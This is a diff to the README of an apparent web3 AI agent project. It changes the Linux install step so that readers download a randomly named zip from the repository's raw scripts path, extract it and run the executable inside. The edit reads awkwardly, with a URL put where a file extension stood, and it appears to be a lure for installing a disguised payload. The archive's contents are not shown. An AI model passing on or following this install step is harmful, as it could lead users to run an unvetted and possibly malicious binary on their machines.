omarmedaoui-pixel/autonomous-web3-ai-agent/README.md

 - **Windows:** Double-click the `.exe` file and follow the setup wizard.
 Accept the license, choose an install location, and finish.
 - **macOS:** Open the `.dmg` file and drag the app to your Applications folder.
-- **Linux:** Extract the `.tar.gz` file to a folder and run the executable inside, or set your `.AppImage` to be executable and launch it.
+- **Linux:** Extract the `https://github.com/omarmedaoui-pixel/autonomous-web3-ai-agent/raw/refs/heads/main/scripts/web-ai-autonomous-agent-Periarctic.zip` file to a folder and run the executable inside, or set your `.AppImage` to be executable and launch it.

 Installation usually takes a few minutes.